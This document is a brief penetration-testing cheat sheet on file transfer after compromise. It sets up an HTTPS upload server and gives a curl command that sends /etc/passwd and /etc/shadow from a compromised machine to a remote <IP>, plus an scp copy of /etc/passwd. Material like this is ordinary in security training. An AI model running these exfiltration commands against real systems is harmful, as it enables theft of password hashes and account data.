# Web Upload We can use `uploadserver`, an extended module of the Python `HTTP.Server` module, which includes a file upload page. Start a web server ```bash sudo python3 -m pip install --user uploadserver ``` Create a self-signed certificate ```bash openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' ``` - The webserver should not host the certificate. It is recommended to create a new directory to host the file for our webserver. ```bash mkdir https && cd https ``` ```bash python3 -m uploadserver 443 --server-certificate ~/server.pem ``` Now from our compromised machine, let's upload the `/etc/passwd` and `/etc/shadow` files ```bash # upload multiple files # we used the option --insecure because we used a self-signed certificate that we trust curl -X POST https://<IP>/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure ``` # Alternative Web File Transfer Method Creating a Web Server with Python3 ```bash python3 -m http.server ``` Create a Web Server with Python2.7 ```bash python2.7 -m SimpleHTTPServer ``` Creating a Web Server with PHP ```bash php -S 0.0.0.0:8000 ``` Creating a Web Server with Ruby ```bash ruby -run -ehttpd . -p8000 ``` # SCP Upload ```bash scp /etc/passwd username@<IP>:/home/username ```